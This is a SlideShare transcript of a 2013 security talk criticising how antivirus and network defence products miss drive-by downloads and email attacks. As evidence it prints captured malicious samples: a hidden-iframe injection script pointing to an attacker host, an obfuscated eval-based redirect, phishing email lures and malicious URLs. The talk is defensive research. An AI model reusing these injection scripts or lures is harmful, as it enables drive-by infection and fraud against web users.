Data Acquisition options - We have a software agent (unix(freeBSD, linux, Solaris) platform compatible) - We can process pcap files. - We can deploy processing platform at your facility (we need remote access) - We have a collector device (1Gb network interface)

More Related Content

PDF
Phd III - defending enterprise
F _
 
PPTX
Java script, security and you - Tri-Cities Javascript Developers Group
Adam Caudill
 
PDF
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich
 
PDF
I thought you were my friend - Malicious Markup
Mario Heiderich
 
PDF
In the DOM, no one will hear you scream
Mario Heiderich
 
PDF
Google chrome presentation
reza jalaluddin
 
PPT
Front end-security
Miao Siyu
 
PDF
Security Vulnerabilities: How to Defend Against Them
Martin Vigo
 
Phd III - defending enterprise
F _
 
Java script, security and you - Tri-Cities Javascript Developers Group
Adam Caudill
 
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich
 
I thought you were my friend - Malicious Markup
Mario Heiderich
 
In the DOM, no one will hear you scream
Mario Heiderich
 
Google chrome presentation
reza jalaluddin
 
Front end-security
Miao Siyu
 
Security Vulnerabilities: How to Defend Against Them
Martin Vigo
 

What's hot (14)

PPTX
Dom based xss
Lê Giáp
 
PPT
Xss talk, attack and defense
Prakashchand Suthar
 
PDF
We need t go deeper - Testing inception apps.
SecuRing
 
PDF
CONFidence 2015: Trust boundaries - Mateusz Kocielski
PROIDEA
 
PDF
Toorcon - Purple Haze: The Spear Phishing Experience
Jesse Nebling
 
PDF
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
PDF
Sf startup-security
Michael Coates
 
PPTX
Passwords#14 - mimikatz
Benjamin Delpy
 
PDF
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
PROIDEA
 
PDF
02 banking trojans-thomassiebert
geeksec80
 
KEY
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
PPTX
Rainbow Tables
Panggi Libersa
 
PPTX
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
RootedCON
 
PPTX
mimikatz @ rmll
Benjamin Delpy
 
Dom based xss
Lê Giáp
 
Xss talk, attack and defense
Prakashchand Suthar
 
We need t go deeper - Testing inception apps.
SecuRing
 
CONFidence 2015: Trust boundaries - Mateusz Kocielski
PROIDEA
 
Toorcon - Purple Haze: The Spear Phishing Experience
Jesse Nebling
 
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Sf startup-security
Michael Coates
 
Passwords#14 - mimikatz
Benjamin Delpy
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
PROIDEA
 
02 banking trojans-thomassiebert
geeksec80
 
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
Rainbow Tables
Panggi Libersa
 
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
RootedCON
 
mimikatz @ rmll
Benjamin Delpy
 
Ad

Similar to whats wrong with modern security tools and other blurps (20)

PDF
Hacklu2012 v07
F _
 
PPTX
Private Data and Prying Eyes
Ellie Sherven
 
PDF
AtlSecCon 2016
Earl Carter
 
PDF
Refugees on Rails Berlin - #2 Tech Talk on Security
Gianluca Varisco
 
PDF
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
OWASP Delhi
 
PPT
Introduction to Malware
amiable_indian
 
PPT
Web security
Jin Castor
 
PPTX
What is the Cybersecurity plan for tomorrow?
Samvel Gevorgyan
 
PDF
Insecurity-In-Security version.1 (2010)
Abhishek Kumar
 
PDF
Education is the Key to Fighting Cyber Crime
Blue Coat
 
PDF
Living with the threat of Determined Attackers - RANT0214
James '​-- Mckinlay
 
PDF
Hitbkl 2012
F _
 
PDF
Tietoturvallisuuden_kevatseminaari_2013_Jarno_Niemela
Valtiokonttori / Statskontoret / State Treasury of Finland
 
PDF
Email security &amp; threads
Inocentshuja Ahmad
 
PDF
OWASP ATL - Social Engineering Technical Controls Presentation
OWASP Atlanta
 
PDF
Living with Determined Attackers MOSI Edition
James '​-- Mckinlay
 
PPTX
Cyber Security Seminar
Jeremy Quadri
 
PDF
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
EC-Council
 
PPTX
Cybersecurity Cyber Usalama
MuhammadRadwan10
 
PDF
Armorizing applications
Iftach Ian Amit
 
Hacklu2012 v07
F _
 
Private Data and Prying Eyes
Ellie Sherven
 
AtlSecCon 2016
Earl Carter
 
Refugees on Rails Berlin - #2 Tech Talk on Security
Gianluca Varisco
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
OWASP Delhi
 
Introduction to Malware
amiable_indian
 
Web security
Jin Castor
 
What is the Cybersecurity plan for tomorrow?
Samvel Gevorgyan
 
Insecurity-In-Security version.1 (2010)
Abhishek Kumar
 
Education is the Key to Fighting Cyber Crime
Blue Coat
 
Living with the threat of Determined Attackers - RANT0214
James '​-- Mckinlay
 
Hitbkl 2012
F _
 
Tietoturvallisuuden_kevatseminaari_2013_Jarno_Niemela
Valtiokonttori / Statskontoret / State Treasury of Finland
 
Email security &amp; threads
Inocentshuja Ahmad
 
OWASP ATL - Social Engineering Technical Controls Presentation
OWASP Atlanta
 
Living with Determined Attackers MOSI Edition
James '​-- Mckinlay
 
Cyber Security Seminar
Jeremy Quadri
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
EC-Council
 
Cybersecurity Cyber Usalama
MuhammadRadwan10
 
Armorizing applications
Iftach Ian Amit
 
Ad

More from F _ (10)

PDF
Rsa2016
F _
 
PDF
Hitcon 2014: Surviving in tough Russian Environment
F _
 
PDF
Honeycon2014: Mining IoCs from Honeypot data feeds
F _
 
PDF
Indicators of Compromise Magic: Living with compromise
F _
 
PDF
Incident Response Tactics with Compromise Indicators
F _
 
PPTX
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
F _
 
PDF
HITB2013AMS Defenting the enterprise, a russian way!
F _
 
PPT
From russia final_bluehat10
F _
 
PPT
2011 hk fyodor-anthony_ppt
F _
 
PDF
0nights2011
F _
 
Rsa2016
F _
 
Hitcon 2014: Surviving in tough Russian Environment
F _
 
Honeycon2014: Mining IoCs from Honeypot data feeds
F _
 
Indicators of Compromise Magic: Living with compromise
F _
 
Incident Response Tactics with Compromise Indicators
F _
 
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
F _
 
HITB2013AMS Defenting the enterprise, a russian way!
F _
 
From russia final_bluehat10
F _
 
2011 hk fyodor-anthony_ppt
F _
 
0nights2011
F _
 

Recently uploaded (20)

PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Cloud computing and distributed systems.
kkkkkhan
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
A Presentation on Artificial Intelligence
memembruh336
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Teaching material agriculture food technology
LiaRayya
 
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 

whats wrong with modern security tools and other blurps

  • 1. Why there is no Silver Bullet Whats Wrong with modern security tools: Exploring (in)accuracy and (in)correctness of modern network defense products GroundZero 2013 V. Kropotov; F. Yarochkin; V. Chetvertakov
  • 2. About speakers ● ● ● Our interests are studying malicious behavior on the network traffic We get greater visibility of on-going activities by monitoring network traffic in Russia and Taiwan We are very interested in expanding So if you have pcaps to share, talk to us :-D @fygrave @vbkropotov @sinitros89
  • 3. Agenda (PT1) ● Security Threats Landscape (intro) ● AV Trolls ● NetSec Trolls ● Combo Trolls ● What else could go wrong ;) ● Conclusion
  • 4. We work together as a research team Today's two presentation topics are connected. The second presentation will be a logical continuation of the this talk
  • 6. Traffic drives cybercrime economy ● You can learn quite abit about primary victims by simply reading thematic forums :) Traff Pricing Source: A botnet load selling portal
  • 7. How to get traff ● Web servers compromise (most common) ● DNS servers or domain names hijacked (add examples from afraid.org) ● ● Banner campaign (adserver/openx compromise. (swiss-cheese ;)) Other infrastructure compromised. Example: memcache poisoning
  • 8. Primary victims ● About 40 000 000 Internet users in Russia According our stats: ● For every 10 000 hosts in Russia ● 500 hosts redirected to landing page every week ● 25-50 hosts with typical protection scheme (NAT, proxy with antivirus, vendor supplied reputation lists, etc.) are COMPROMISED
  • 10. News/Media outlets are very popular this year Domain Resource type Campaign dates unique hosts per day News – official gov publisher news Autumn 2013 ~ 790 000 Winter 2013 – Autumn 2013 ~ 590 000 gazeta.ru news Spring 2013 - Autumn 2013 ~ 490 000 aif.ru news Spring 2013 - Autumn 2013 ~ 330 000 mk.ru news Summer 2013 ~ 315 000 vz.ru news Winter 2013 – Summer 2013 ~ 170 000 lifenews.ru news Summer 2013 ~ 170 000 topnews.ru news rg.ru newsru.com Spring 2013 - Autumn 2013 ~ 140 000
  • 11. Video, mail, regional gov – you choose...! Domain Resource type Youtube.com When seen unique hosts per day Summer 2013 - Autumn 2013 (malvertising?!) Alexa N 3 mail.ru Public email, search engine Winter 2013 Alexa N 33 Vesti.ru TV news Winter 2013 ~ 1 050 000 tvrain.ru TV Autumn 2013 ~ 250 000 mos.ru Moscow gov portal Winter 2013 – Spring 2013 ~150 000 glavbukh.ru Accountants Spring 2013 - Autumn 2013 ~65 000 tks.ru Finance (Import/Explort) Summer 2013 - Autumn 2013 ~38 000
  • 12. Oops, a regional GOV resource, July 2013 <script src="http://changeip.changeip.name/rsize.js">
  • 13. So you have your exploit crawling framework? - can it move the mouse too... :) <script src="http://changeip.changeip.name/rsize.js"> ● ● res='bhduqnd.selfip.org';var astatf = 0; ● document.write("<head></head><b><div id='accountil'></div></b>"); ● document.onmousemove=jsstatic; ● function jsstatic() { if (astatf == 0) { astatf++; text = "<iframe src='http://"+res+"/bashimme/2' width='7' height='12' style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe>"; ● document.getElementById("accountil").innerHTML = text }} ● </script>
  • 15. dns abuse of a legit domain ● domain: SCHOOLOPROS.RU ● nserver: ns1.afraid.org. ● nserver: ns2.afraid.org. ● state: REGISTERED, DELEGATED, VERIFIED ● org: LLC "GKShP" ● registrar: ● admin-contact: https://www.nic.ru/whois ● created: ● paid-till: ● free-date: RU-CENTER-REG-RIPN 2010.01.25 2014.01.25 2014.02.25I
  • 16. How are you going to blacklist this?! deaswqwehdskdqw.homelinux.com → 176.31.140.65 ● ● b3f21817812f11a62eb1b506.homelinux.com → 93.189.29.235 5f87b942cfa67def68889b81.homelinux.com → 93.189.29.235 lapachka.info → 93.189.29.235 Domain Name:LAPACHKA.INFO Created On:05-Jun-2013 20:31:33 UTC Last Updated On:20-Aug-2013 07:36:23 UTC Expiration Date:05-Jun-2014 20:31:33 UTC Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
  • 17. File extension based filters?! http://hk.sz181.com/images/c4a.jpg ← Win32 Executable (payload) Domain Name:sz181.com Record last updated at 2013-03-11 09:27:18 Record created on 3/10/2005 Record expired on 03/10/2014 name:(ShenZhen Johns Property Accessory Supply Co.,LTD) mail:(kf@johns168.com) +86.75526919616 +86.75526919856 ShenZhen Johns Property Accessory Supply Co.,LTD <object width="640" height="60" classid="clsid:D27CDB6E-AE6D-11cf-96B8-4 src="http://www.35.com/upload/35WHOIS_FLASH__640_60.swf" width="640" Billing Contactor: ShenZhenShi ShenNanDaDao1021 Hao XiNianZhongXin 12A03 SHENZHEN Guangdong, 18 CN 518040
  • 18. So how fast are Security Vendors with new signatures?! ● AntiVirus Vendors – Hours..Days ● Network Proxy Filtering - Days..Weeks ● Other network security – Days..Weeks..Months ..?
  • 19. Updates are dangerous too. This kills an executable from a legit SAP installation 20
  • 20. so.. the FUI (Fuck up indicators) ● Antivirus == damn good Fuck Up indicator of your daily monitoring work. If you see ex. CVE-2012-0158 the e-mail, received 1 year ago - you see you fucked it up a year ago, but now must be able to react. :) 25.10.2012 18:01 Test_host01 Exploit-CVE2012-0158.f!rtf Undetermined clean error, deleted successfully C:Documents and SettingsUser02Desktop2readModern energy in China.msg68.OLE 25.10.2012 18:01 Test_host01 Exploit-CVE2012-0158.f!rtf Undetermined clean error, deleted successfully C:Documents and SettingsUser02Desktop2readUS energy.msg68.OLE 21
  • 21. Email as attack vector.. are you a target? APT? Non-targeted ● ● ● Single exploit Content of the mail is accurate to context Specific payload behavior (stats) ● ● Mass-mailed Often no exploit used (.exe in attach)
  • 22. APT through email.. An RTF document (CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability." ) Payload writes a dll file Recent build date (2013) Autorun for persistence Calls back to C2 server group Suspicious user Agents: Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3) Mozilla/4.0 (compatible; MSIE 5.0.2) Mozilla/4.0 (compatible)
  • 23. Owning a network.. ● Vulnerabilities seen in use through this attack vector: MS Office Adobe Acrobat reader CVE-2013-0640 CVE-2012-0775 Adobe flash player CVE-2012-1535 CVE-2012-0158 CVE-2011-1269 CVE-2010-3333 CVE-2009-3129 Java CVE-2013-0422 CVE-2012-1723 CVE-2012-5076
  • 24. But... ● Human stupidity is exploited more than ever..
  • 25. Email with a password protected archive or a document ● ● ● Password protected archives bypass AV checks, firewall/WAF/.. detection No exploit. Executable File is masked as document (icon, extension) Message contents motivates user to open the attachment (social engineering)
  • 26. Lets look at some examples Добрый день, По результатам проверки, у нашей фирмы обнаружился долг перед Вами за январь на сумму 9540 рубл. Наш главбух составила акт сверки и просит подписать данный акт и выслать его скан. А также спрашивает, что лучше написать при переводе средств. ______________________________________________________________ _______________________ С уважением, комерческий директор ОАО "М-ТОРГ" Маркина Ольга Алексеевна ps. акт сверки в приложении к письму, пароль к архив 111
  • 27. Examples (cont...) Добрый день, По результатам аудиторской проверки, у нашей фирмы обнаружился долг пере Вами за декабрь 2012г. в сумме 49540 рубл. Наш главбух составила акт сверки и просит подписать данный акт и выслать его скан. А также спрашивает, что лучше написать при переводе средств. _______________________________________________________________________ ________ С уважением, бухгалтер ЗАО "МСК" Калинина Вера Владимировна ps. акт сверки в приложении к письму, пароль к архиву 123 Good afternoon, According to the results of the audit, our firm will transfer the debt to you for? December 2012. in the sum of 49540 rubles. Our chief accountant make an act of reconciliation and asked to sign the act and send it’s scan. ______________________________________________________________________________ Sincerely, Accountant of "MSK"? Vera V. Kalinina P.s. statement attached to the letter, the password for the archive 123
  • 28. .. and inside archive :) Unpacked file
  • 29. Another example Subject: British Airways E-ticket receipts e-ticket receipt Booking reference: 05V9363845 Dear, Thank you for booking with British Airways. Ticket Type: e-ticket This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking. Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file) Yours sincerely, British Airways Customer Services British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system. British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB. How to contact us Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways. If you require further assistance you may contact us If you have received this email in error This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
  • 30. Another variation: email that contains masked links to malicious pages •No attachment. The message text is html/text points to the same resource •All links are 'masked' to be pointing to legit links •The same attreactive text of the message
  • 31. Encoded redirect.. <body> <h1><b>Please wait. You will be forwarded.. . </h1></b> <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br> <script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151} catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg) {asd=0;try{}catch(q){asd=1;}if(!asd) {w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102, 39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115, 44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113, 115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,10 3,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];i f(window.document)for(i=2-2;-i+104!=0;i+=1) {j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script> </body> </html>
  • 32. Hot topic for big company, Cyprus Crisis Diana Ayala saw this story on the BBC News website and thought you should see it. ** Cyprus bailout: bank levy passed parliament already! ** Cyprus can amend terms to a bailout deal that has sparked huge public anger.... < http://www.bbc.com.us/go/em/news/world-cyprus-57502820> ** BBC Daily E-mail ** Choose the news and sport headlines you want - when you want them, all in one daily e-mail < http://www.bbc.co.uk/email> ** Disclaimer ** The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here
  • 33. This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery: Package Type: QTR/YE Reporting Courier: UPS Ground Estimated Time of Arrival: Tusesday, 5:00pm Tracking Number (if one is available for this package): 1Z023R961390411904 Details: Click here to view and/or modify order We will notify you via email if the status of your delivery changes. -------------------------------------------------------------------------------Access these and other valuable tools at support.ADP.com: o Payroll and Tax Calculators o Order Payroll Supplies, Blank Checks, and more o Submit requests online such as SUI Rate Changes, Schedule Changes, and more o Download Product Documentation, Manuals, and Forms o Download Software Patches and Updates o Access Knowledge Solutions / Frequently Asked Questions o Watch Animated Tours with Guided Input Instructions Thank You, ADP Client Services support.ADP.com -------------------------------------------------------------------------------This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.
  • 34. What happens if you click..
  • 35. AV logs – useful ;) Antivirus find exploit in cache -> we was attacked -> antivirus saves us! ;-) The exploit can be in cache – AV finds it :)
  • 36. s AV actually removes a forensic trace. PROFFIT :)
  • 37. Incident entry point ● ● Many vendors able to mine their clouds But you need know a starting point for your exploration ...
  • 38. Death of AVs as we know them ● Automatic malicious binaries builders – Unskilful attacker can produce unique binaries with a single click One sig per binary makes you transfer Tbs of data to end-user machines :) A simple solution – move sigs into cloud :-)
  • 42. AV behaviour is not new ● EmergingThreats rule, first added 2011-06-27 20:14:35 UTC alert udp $HOME_NET any -> any 53 (msg:"ET CURRENT_EVENTS Large DNS Query possible covert channel"; content:"|01 00 00 01 00 00 00 00 00 00|"; fast_pattern; depth:10; offset:2; dsize:>300; content:!"youtube|03|com|00|"; content:!"sophosxl|03|net|00|"; content:!"|0a|hashserver|02|cs|0a|trendmicro|03|com|00|"; content:!"spamhaus|03|org|00|"; classtype:bad-unknown; sid:2013075; rev:7;)
  • 43. AV trolls ● Date/Time 2011-09-06 17:13:05 MSD ● Tag Name PDF_XFA_Script ● Severity Low ● Target IP Address ● Target Port 9090 ● Source IP Address 10.y.y.y ● SourcePort Name 3201 ● arg ● 10.x.x.x host=http://sonorophone.in&b=af7bb2f
  • 45. VT says nothing? payload in .jar feb 2013 46
  • 46. AV is silent during attack, WHY?
  • 47. Just because malware obfuscation service is available ● 70$ per month, is it OK, * * Max Goncharov Talk at PHDaysIII
  • 48. So how do you know when to reencrypt?
  • 49. Example, Aug 2013 <object height="0" align="left" width="0" type="text/html" data="http://wrutr.VizVaz.com/viewforum.php? b=cc119b1"></object>
  • 52. Detection During the Time October 2013 53
  • 53. Side effects of heuristic detection August 2013 October 2013 54
  • 54. 55
  • 55. AV claims: VT is Not Fair?? 23.01.13 19:56 Detected: Trojan-Spy.Win32.Zbot.aymr C:/Documents and Settings/user1/Application Data/ Sun/Java/Deployment/cache/6.0/27/4169865b-641d53c9/UPX 23.01.13 19:56 Detected: Trojan-Downloader.Java.OpenConnection.ck C:/Documents and Settings/user1/Application Data/ Sun/Java/Deployment/cache/6.0/48/38388f30-4a676b87/bpac/b.class 23.01.13 19:56 Detected: Trojan-Downloader.Java.OpenConnection.cs C:/Documents and Settings/user1/Application Data/Sun/Java/Deployment/cache/6.0/48/38388f30-4a676b87/ot/pizdi.class 23.01.13 19:58 Detected: HEUR:Exploit.Java.CVE-2013-0422.gen C:/Documents and Settings/user1/Local Settings/ Temp/jar_cache3538799837370652468.tmp 56
  • 56. Yes. You have been compromised one week before... 1/14/2013 18:57 178.238.141.19 http://machete0-yhis.me/ pictures/demos/OAggq application/x-javaarchive 1/14/2013 18:57 178.238.141.19 http://machete0yhis.me/pictures/demos/OAggq application/x-javaarchive 1/14/2013 18:57 178.238.141.19 http://loretaa0application/octetshot.co/careers.php? stream cert=561&usage=392&watch=4 &proxy=49&ipod=171&shim=34 4&pets=433&icons=252&staff=6 21&refer=345 * reproduced on the stand, to estimate Vendor signatures updated time 57
  • 57. Avs are still useful.. lets look at some examples ● Bootkits ● Rootkits ● Others 58
  • 58. Appropriate AV use 30.10.2013 file infected. Undetermined clean 5:46 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:37 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:44 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:50 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:57 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:58 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 7:01 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 7:04 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 7:11 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 59
  • 59. Appropriate AV use Cases, Email under attack, exe usually not targeted Event Generated Time (UTC) Threat Name Event Category Threat Type Threat Target File Path 10/23/13 12:03:54 AM PWSZbot-FIU! 059FF890153F Malware detected Trojan KURUOGLU 5 Enquiry.zipKURUO GLU 5 Enquiry..exe 10/25/13 4:55:37 AM PWSZbot-FIU! BC53FFF6285 D Malware detected Trojan Info_Invoice..no.16 6583.zipInfo_Invoic e..no.166583.exe 60
  • 60. Appropriate AV use Cases, Office documents ● ● ● Event Generated Time (UTC): 7/8/13 12:25:46 PM Threat Source User Name: "Sports .ru" <sport.info@bk.ru> Threat Target File Прогнозы на Евро 2012 от экстрасенсов и аналитиков.doc* ● Event Category: Malware detected ● Threat Name: Exploit-CVE2012-0158.b!rtf ● Threat Type: Virus ● Action Taken: Deleted * Euro 2012 forecast from ... doc 61
  • 61. Appropriate AV use Cases, The same file was deleted, but many times Threat Target File Path Threat Name Event Received Action Time (UTC) Taken RDN/Generic.dx! cmr 10/27/13 9:56:54 PM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/28/13 10:05:06 PM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/29/13 9:54:37 PM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/30/13 5:23:49 AM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/30/13 9:42:07 PM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/31/13 9:55:37 PM Deleted 62 C:Documents and SettingstestuserApplication
  • 65. DNS Traffic Analysis.. What you can do with this event?
  • 67. Where is the booby trap
  • 69. Yep, vendor were able to detect APT
  • 70. Appropriate Network tools use ● Pray ● Detect as you can ● Check, maybe your vendor supplied tool detected it somehow, and you can use this information, but next time Date/Time 2012-05-15 11:50:16 Tag Name HTTP_Post Severity Low Observance Type Intrusion Detection Target IP Address 74.63.83.38 :server be4appy.com :URL /rep/cim.php algorithm-id 3000003 Packet DestinationPort 80 71
  • 71. Oh, yepp, Web proxies
  • 73. Exploit Kits and TDS now personal? ● hxxp://get.adnova.ru/?v2=1&ver=2&pad=2943&block=1362768946&url=http%3A%2F %2Fratushnyak.org%2Fpage%2Fshark-cartilage.html&ref=http%3A%2F%2Fnova.rambler.ru%2Fsearch %3Fquery%3D%25D0%25B0%25D0%25BA%25D1%2583%25D0%25BB %25D0%25B8%25D0%25B9%2B%25D1%2585%25D1%2580%25D1%258F%25D1%2589%2B %25D0%25BE%25D1%2582%25D0%25B7%25D1%258B %25D0%25B2%25D1%258B&sw=1280&sh=1024&cw=1189&ch=879&fl=0&nc=0.2519320439819137 --> ● gendarme795.kiltie146.dyndns-pics.com 54.217.234.176 80 GET ● hxxp://gendarme795.kiltie146.dyndns-pics.com/?in=51118 ● Personal Network Storage, Internet Services Wed, 23 Oct 2013 12:20:25 GMT
  • 74. Exploit Kits and TDS now personal? ● hxxp://nashaporno.ru/ --> 176.122.88.106 qzzj.dyndns.tv ● GET ● Tue, 08 Oct 2013 06:58:32 GMT ● hxxp://qzzj.dyndns.tv/out.php?sid=1 Personal Network Storage, Internet Services
  • 75. May be forums? ● ● 37.9.52.134 80 GET hxxp://bzsdrt.attraction-visitors.ru/ viewforum.php?b=ca3990d text/html ● Tue, 15 Oct 2013 06:51:39 GMT ● Forum/Bulletin Boards
  • 77. Oops, innovate search engine? ● ● 95.211.39.86 tanyauaa90.ru http://tanyauaa90.ru/tuka4/?1&se_referer=http%3A%2F%2Fnova.rambler.ru %2Fsearch%3Fquery%3D %25D1%2586%25D0%25B5%25D1%2580%25D0%25BE %25D0%25B1%25D1%2580%25D0%25B0%25D0%25B7%25D0%25B5%2 5D0%25BB%25D0%25B8%25D0%25BD%2B%25D0%25BF %25D1%2580%25D0%25BE %25D0%25B8%25D0%25B7%25D0%25B2%25D0%25BE %25D0%25B4%25D0%25B8%25D1%2582%25D0%25B5%25D0%25BB %25D1%258C&referer=http%3A%2F%2Fspireritmen1293.dlinkddns.com %2Foe4500drajverad555%2Fcerobrazelin_instrukciya_po_primeneniyu_cen a.html ● Fri, 18 Oct 2013 08:39:17 GMT ● Search Engines, Internet Services domain: registrar: created: ● ● TANYAUAA90.RU REGRU-REG-RIPN 2013.10.17
